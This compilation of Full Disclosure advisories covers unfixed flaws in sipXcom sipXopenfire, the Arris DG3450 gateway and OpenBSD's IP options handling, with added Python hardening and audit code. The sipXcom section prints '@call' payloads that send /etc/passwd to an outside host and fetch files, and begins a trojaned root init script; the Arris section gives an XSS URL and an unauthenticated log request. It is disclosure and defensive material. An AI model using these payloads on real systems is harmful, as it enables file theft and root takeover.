[FD] [CVE-2023-25355/25356] No fix available - vulnerabilities in CoreDial sipXcom sipXopenfire
_ ¯¯¯\__/ ༼ つ ◕_◕ ༽つ (ง'̀-'́)ง(╯°□°)╯︵ ┻━┻ ヽ(´ー`)ノ \__/¯¯ ¯

Product: sipXcom sipXopenfire
Vendor: CoreDial
Name: "sipXcom sipXopenfire XMPP message system command argument injection and insecure service file permissions RCE"
Version: 21.04 and earlier
Fixed: Nope, no response
Link: http://download.sipxcom.org/
CVEs: CVE-2023-25355 & CVE-2023-25356

_ ¯¯\__/ ༼ つ ◕_◕ ༽つ (ง'̀-'́)ง(╯°□°)╯︵ ┻━┻ ヽ(´ー`)ノ \__/¯¯¯ ¯

¯ TL;DR ¯

CoreDial's sipXcom is a PBX server. It bundles an XMPP server component, sipXopenfire, which is disabled by default.

sipXopenfire is affected by an OS command argument injection vulnerability (CVE-2023-25356), which allows any user with an XMPP account to pass arbitrary arguments to a curl command. The same component is also affected by a weak file permissions vulnerability (CVE-2023-25355), affecting a service startup script which runs as root. Both issues can be chained to execute commands as the system root user.

At the time of this disclosure, we have had no response from CoreDial, and neither issue has been fixed.

_
¯ CVE-2023-25356: OS Command Argument Injection ¯

As part of the initializePlugin() routine in sipXopenfire\presence-plugin\src\org\sipfoundry\openfire\plugin\presence\SipXOpenfirePlugin.java, an "interceptor" called DefaultMessagePacketInterceptor is registered. The DefaultMessagePacketInterceptor inspects every message that's sent through the XMPP server. If a message starts with any of the strings "@call", "@conf" or "@xfer" (referred to internally as "directives"), a related code path is taken, where the message content is processed according to what the specific directive is meant to achieve.

When a message is intercepted which starts with "@call", all the text after this string is assumed to be a phone number and passed to the buildRestCallCommand() function. This function creates a long URL, which the user input is written directly into. There's no particular attempt to sanitise this input.

This URL is then passed to the sendRestRequest() function, where it is appended to a curl command string. This string is then passed to Runtime.getRuntime().exec(command). Due to the inner mechanics of Runtime's exec() function, we are only able to control arguments passed to the main curl command. The constructed curl command is as follows:

```
curl -k -X POST http://[IPAddress]:[Port]/callcontroller/[callerNumber]/[controlledString]timeout=30=true
```

Since we can inject arbitrary arguments, we can construct a set of arguments which will read a file using the -d/--data flag, and send it over the network to us. The only limitation is that the sipXopenfire process runs as the daemon user, so we can only read files that are accessible to daemon. However, this includes potentially interesting files, like the chat history (/opt/openfire/logs/sipxopenfire-im.log) when chat logging is enabled.

As a proof of concept, the following payload will read /etc/passwd and post it to http://192.168.96.128/abc.

```
@call abc -o/tmp/test123 -d @/etc/passwd http://192.168.96.128/abc
```

We can also download files and write them to the server filesystem. The following will download the file from http://192.168.96.128/test.txt and write it to /tmp/test.txt:

```
@call abc -o /tmp/dummy -o /tmp/test.txt -X GET http://192.168.96.128/test.txt -o /tmp/dummy
```

_
¯ CVE-2023-25355: Weak Service File Permissions ¯

The /etc/init.d/openfire service file is owned by the daemon user and group, but runs as the root user. This gives a relatively clear path to privilege escalation. It also provides a very useful exploitation path when chained with the curl argument injection issue.

Since we can download files and write them to the filesystem, and the sipXopenfire process runs as the daemon user, we can overwrite the /etc/init.d/openfire file with a modified version. The following modified /etc/init.d/openfire will return a shell to port on 192.168.96.128 when the sipXopenfire service is (re)started.

```
#!/bin/sh
#
# openfire      Stops and starts the Openfire XMPP service.
#
# chkconfig: 2345 99 1
# description: Openfire is an XMPP
```
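The argument-injection pattern the post describes, reproduced in Python as an added example (this is not sipXopenfire's code or the poster's) next to a hardened version. The REST host and port, the URL shape "base/caller/<user text>" and the allow-list for a dialable number are assumptions for this example; the point shown is that a single command string split on whitespace turns user text into extra curl arguments, while validation plus an argv list does not.

```python
import re
import subprocess

# Assumed placeholders for the REST endpoint; the exact URL sipXopenfire
# builds is not reproduced here, only the shape "base/caller/<user text>".
REST_HOST = "127.0.0.1"
REST_PORT = 8080

# Assumed allow-list for a dialable target: optional leading '+', then digits
# and the DTMF symbols '*' and '#'. Whitespace and '-' can never pass.
NUMBER_RE = re.compile(r"\+?[0-9*#]{1,32}")


def build_command_unsafe(caller, user_text):
    """The pattern in the advisory: user text goes straight into the URL, the
    URL into one command string, and the string is then tokenised on
    whitespace, which is what Runtime.exec(String) does. Returns the argv
    that results, so injected tokens show up as extra curl arguments."""
    url = f"http://{REST_HOST}:{REST_PORT}/callcontroller/{caller}/{user_text}"
    command = f"curl -k -X POST {url}"
    return command.split()


def parse_call_directive(message):
    """Take the text after '@call' and validate it. Raises ValueError for
    anything that is not a plain dialable number."""
    if not message.startswith("@call"):
        raise ValueError("not a @call directive")
    target = message[len("@call"):].strip()
    if not NUMBER_RE.fullmatch(target):
        raise ValueError(f"rejected call target: {target!r}")
    return target


def build_command_safe(caller, message):
    """Hardened form: validate first, then build argv as a list. Each element
    is exactly one argument whatever it contains (ProcessBuilder(List<String>)
    in Java gives the same guarantee), so the target can never become extra
    curl flags; the allow-list additionally keeps it from starting with '-'."""
    target = parse_call_directive(message)
    url = f"http://{REST_HOST}:{REST_PORT}/callcontroller/{caller}/{target}"
    return ["curl", "-k", "-X", "POST", url]


def is_rejected(caller, message):
    """True if the hardened builder refuses the message."""
    try:
        build_command_safe(caller, message)
    except ValueError:
        return True
    return False


def run(argv):
    """Execute an argv list directly, never through a shell. Not called by the
    demo; shown only to make the intended call site explicit."""
    return subprocess.run(argv, check=False, capture_output=True)


if __name__ == "__main__":
    # Constructed messages: a normal call and one carrying extra tokens.
    print(build_command_unsafe("1000", "abc -o /tmp/out"))
    print(build_command_safe("1000", "@call 15551234567"))
    print(is_rejected("1000", "@call abc -o /tmp/out"))
```

The allow-list matters as much as the argv list: with a list, whitespace can no longer split one argument into several, but a value beginning with "-" would still be handed to curl as an option if nothing restricted the characters first.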
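A file-permission audit of the kind that would have flagged CVE-2023-25355, as an added Python example (not part of the advisory or of sipXcom): it checks that a script the init system runs as root is root-owned, not group- or world-writable, and sits in a directory that cannot be used to replace it. The root_uid parameter and the constructed temporary script exist only so the demo runs on an unprivileged account.

```python
import os
import stat
import tempfile


def audit_service_file(path, root_uid=0):
    """Return a list of findings (empty means OK) for one script that the init
    system executes as root. root_uid is a parameter only so the demo below
    can run on an unprivileged account; on a real host leave it at 0 and
    point path at e.g. /etc/init.d/openfire."""
    st = os.lstat(path)
    findings = []
    if stat.S_ISLNK(st.st_mode):
        findings.append("symlink (audit the target instead)")
        return findings
    mode = stat.S_IMODE(st.st_mode)
    if st.st_uid != root_uid:
        findings.append(f"owner uid {st.st_uid} is not root")
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    # The containing directory matters too: write access there allows the
    # file to be unlinked and replaced even when the file itself is read-only.
    parent = os.lstat(os.path.dirname(os.path.abspath(path)))
    if parent.st_uid != root_uid:
        findings.append("parent directory not owned by root")
    elif (stat.S_IMODE(parent.st_mode) & (stat.S_IWGRP | stat.S_IWOTH)
          and not parent.st_mode & stat.S_ISVTX):
        findings.append("parent directory writable by group/others")
    return findings


def audit_directory(dirpath, root_uid=0):
    """Audit every regular file or symlink in an init-script directory.
    Returns {path: findings} for entries with at least one finding."""
    report = {}
    for name in sorted(os.listdir(dirpath)):
        p = os.path.join(dirpath, name)
        if os.path.isfile(p) or os.path.islink(p):
            found = audit_service_file(p, root_uid)
            if found:
                report[p] = found
    return report


def demo():
    """Constructed stand-in for the advisory's situation: a script writable by
    its owner's group and owned by an unprivileged account. Returns findings
    once with root_uid set to the current user (so only the mode is wrong) and
    once with a different uid (so ownership is wrong as well)."""
    tmpdir = tempfile.mkdtemp()
    path = os.path.join(tmpdir, "openfire")
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\n# constructed sample, not the real init script\n")
    os.chmod(path, 0o775)  # rwxrwxr-x: the owning group can overwrite it
    me = os.getuid()
    return {
        "mode_only": audit_service_file(path, root_uid=me),
        "mode_and_owner": audit_service_file(path, root_uid=me + 1),
    }


if __name__ == "__main__":
    for label, findings in demo().items():
        print(label, findings)
```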
[FD] SEC Consult SA-20230306-0 :: Multiple Vulnerabilities in Arris DG3450 Cable Gateway
SEC Consult Vulnerability Lab Security Advisory < 20230306-0 >
===
title: Multiple Vulnerabilities
product: Arris DG3450 Cable Gateway
vulnerable version: AR01.02.056.18_041520_711.NCS.10
fixed version: -
CVE number: CVE-2023-27571, CVE-2023-27572
impact: medium
homepage: https://www.commscope.com
found: 2022-10-21
by: S. Robertz (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult, an Atos company
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
Arris has been acquired by CommScope in 2019.

"At CommScope we push the boundaries of communications technology to create the world’s most advanced networks. We design, manufacture, install and support the hardware infrastructure and software intelligence that enable our digital society to interact and thrive. Working with customers, we advance broadband, enterprise and wireless networks to power progress and create lasting connections. Across the globe, our people and solutions are redefining connectivity, solving today’s challenges and driving the innovation that will meet the needs of what’s next."

Source: https://www.commscope.com/about-us/

Business recommendation:
---
The vendor did not reply to any of our communication attempts. The security issues have not been fixed. Users of this product are urged to contact their support representative and request the vulnerabilities to be fixed.

SEC Consult highly recommends performing a thorough security review of the product, conducted by security professionals, to identify and resolve potential further security issues.

Vulnerability overview/description:
---
1) Reflected Cross-Site-Scripting Vulnerability (CVE-2023-27572)
An attacker can execute arbitrary JavaScript code in the context of the victim's session, and thus perform all actions, exfiltrate information, etc. In order to exploit this vulnerability the attacker will have to trick the user into visiting a manipulated URL.

2) Missing Authentication (CVE-2023-27572)
Logfiles can be downloaded without prior authentication, once the correct URL is known. This allows an attacker to gain further information about the usage of the device.

Proof of concept:
---
1) Reflected Cross-Site-Scripting Vulnerability (CVE-2023-27572)
The following URL has to be visited by the victim in order to execute arbitrary JavaScript code.

http://$IP/https_redirect.php?page=%22;alert(document.domain);var%20dummy=%22

2) Missing Authentication (CVE-2023-27572)
The following HTTP request will return the log file of the device without checking for a valid session cookie.
---
GET /troubleshooting_logs_download.php?log_type=system_frame=today HTTP/1.1
Host: $IP

HTTP/1.1 200 OK
X-Content-Type-Options: nosniff
Set-Cookie: PHPSESSID=38b5a65ba1a4477e29efd73ee1e01554; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
strict-transport-security: max-age=600; includeSubDomains
Server: ARRIS Server
X-Frame-Options: DENY
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'; worker-src blob:
Cache-control: private
Pragma: private
Expires: 0
Content-type: text/plain;charset=utf-8
Content-Disposition: attachment; filename="troubleshooting_logs_system_today.txt"
Content-Transfer-Encoding: binary
Accept-Ranges: bytes
Content-Length: 437
Date: Tue, 21 Jun 2022 20:51:07 GMT

GUI: User:admin login 06/15/2022 22:46:56 Notice
GUI: User:admin logout 06/15/2022 22:42:14 Notice
GUI: User:admin logout 06/15/2022 22:41:26 Notice
GUI: User:admin logout 06/15/2022 22:41:06 Notice
GUI: User:admin logout 06/15/2022 22:40:47 Notice
GUI: User:admin login 06/15/2022 22:33:22 Notice
GUI: User:admin logout 06/15/2022 22:31:51 Notice
---

Vulnerable / tested versions:
---
The vulnerabilities have been tested on the following device / firmware:
* Arris DG3450 with software version AR01.02.056.18_041520_711.NCS.10

Vendor contact timeline:
---
2022-11-22: Contacting vendor through tac.helpd...@commscope.com; no response.
2022-12-05: Asking for security contact through @Arris Twitter social media. No response. Received "You can no longer send messages to this person" after initial message.
2022-12-05: Contacting vendor via privacycont...@commscope.com; no response.
2023-01-24: Contacting vendor again via privacycont...@commscope.com and tac.helpd...@commscope.com; no response.
2023-03-02
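The two server-side fixes that would close the issues in this advisory, written in Python as an added example rather than the gateway's own PHP. The page allow-list, the JavaScript template into which the page parameter is embedded and the session store are constructed for the example; the session-cookie name PHPSESSID is the one visible in the response above.

```python
import json

# Constructed allow-list of pages the redirect script may send the browser to.
ALLOWED_PAGES = {"index.php", "status.php", "wifi.php"}


def render_redirect_unsafe(page):
    """The pattern the PoC URL targets (assumed template): the parameter lands
    inside a JavaScript string literal unencoded, so a value containing '";'
    closes the literal and whatever follows runs as script."""
    return f'<script>var target = "{page}"; location.href = target;</script>'


def js_string_literal(value):
    """Serialise a string as a JavaScript string literal that cannot break
    out of itself or the surrounding <script> block. json.dumps escapes
    quotes, backslashes and all non-ASCII (so U+2028/2029 are covered); the
    extra substitutions stop '</script>' and '&' from reaching the HTML parser."""
    encoded = json.dumps(value)
    for raw, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        encoded = encoded.replace(raw, esc)
    return encoded


def render_redirect_safe(page):
    """Fixed form: unknown targets are replaced by a default instead of being
    reflected, and whatever is emitted is encoded for the JS string context."""
    if page not in ALLOWED_PAGES:
        page = "index.php"
    return f'<script>var target = {js_string_literal(page)}; location.href = target;</script>'


def handle_log_download(cookies, sessions, log_text):
    """Log download handler with the check the advisory found missing: the
    PHPSESSID cookie must map to an authenticated session before any log
    content is returned. Returns (status, body)."""
    sid = cookies.get("PHPSESSID")
    if sid is None or sid not in sessions:
        return 401, "authentication required"
    return 200, log_text


if __name__ == "__main__":
    payload = '";alert(document.domain);var dummy="'   # decoded form of the PoC parameter
    print(render_redirect_unsafe(payload))
    print(render_redirect_safe(payload))
    # Constructed session store and a log line shaped like the ones quoted above.
    sessions = {"constructed-session-id": "admin"}
    log = "GUI: User:admin login 06/15/2022 22:46:56 Notice\n"
    print(handle_log_download({}, sessions, log))
    print(handle_log_download({"PHPSESSID": "constructed-session-id"}, sessions, log))
```

The allow-list alone would already stop the reflected payload; the context-aware encoding is kept as a second layer so that a future change to the allow-list cannot silently reintroduce the injection.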
[FD] OpenBSD overflow
Hi,

Fun OpenBSD bug. ip_dooptions() will allow IPOPT_SSRR with optlen = 2. save_rte() will set isr_nhops to a very large value, which will cause an overflow in the next ip_srcroute() call.

More info is here: https://github.com/fuzzingrf/openbsd_tcpip_overflow/

-erg

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
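The length check at the root of the bug above, shown as an added Python parser for the IPv4 options area (this is not OpenBSD's code and does not reproduce its isr_nhops arithmetic). Option type values and the minimum lengths are the RFC 791 ones: a strict or loose source-route option carries type, length and pointer before any addresses, so a length below 3 (such as the optlen = 2 in the report) or a pointer below 4 must be rejected before anything derives a hop count from it.

```python
import ipaddress

# RFC 791 option type values (standard, not taken from the bug report).
IPOPT_EOL = 0
IPOPT_NOP = 1
IPOPT_RR = 7
IPOPT_LSRR = 131
IPOPT_SSRR = 137
ROUTE_OPTS = {IPOPT_RR, IPOPT_LSRR, IPOPT_SSRR}
ROUTE_FIXED_LEN = 3   # type, length, pointer
ROUTE_MIN_PTR = 4     # first address slot follows the three fixed bytes


def parse_ip_options(opts):
    """Parse the options area of an IPv4 header (bytes). Returns a list of
    dicts, with decoded hop addresses for route options. Raises ValueError on
    any length that cannot be walked safely, including a route option whose
    length is smaller than its 3-byte fixed part, which is the case the
    report says the kernel accepts."""
    out = []
    i, n = 0, len(opts)
    while i < n:
        t = opts[i]
        if t == IPOPT_EOL:
            break
        if t == IPOPT_NOP:
            i += 1
            continue
        if i + 1 >= n:
            raise ValueError("option type without length byte")
        olen = opts[i + 1]
        # olen < 2 would also make the loop stand still or walk backwards.
        if olen < 2 or i + olen > n:
            raise ValueError(f"option {t}: bad length {olen}")
        body = opts[i:i + olen]
        entry = {"type": t, "len": olen}
        if t in ROUTE_OPTS:
            if olen < ROUTE_FIXED_LEN:
                raise ValueError(f"route option {t}: length {olen} < {ROUTE_FIXED_LEN}")
            ptr = body[2]
            if ptr < ROUTE_MIN_PTR:
                raise ValueError(f"route option {t}: pointer {ptr} < {ROUTE_MIN_PTR}")
            if (olen - ROUTE_FIXED_LEN) % 4:
                raise ValueError(f"route option {t}: route data not a multiple of 4")
            # Only now is a hop count derived from the length; with olen
            # validated it can never underflow.
            nhops = (olen - ROUTE_FIXED_LEN) // 4
            entry["pointer"] = ptr
            entry["hops"] = [
                str(ipaddress.IPv4Address(body[3 + 4 * k:7 + 4 * k]))
                for k in range(nhops)
            ]
        out.append(entry)
        i += olen
    return out


def rejects(opts):
    """True if the parser refuses the given options bytes."""
    try:
        parse_ip_options(opts)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed samples: a two-hop SSRR option and the optlen = 2 case.
    good = bytes([IPOPT_SSRR, 11, 4, 10, 0, 0, 1, 10, 0, 0, 2])
    print(parse_ip_options(good))
    print(rejects(bytes([IPOPT_SSRR, 2])))
```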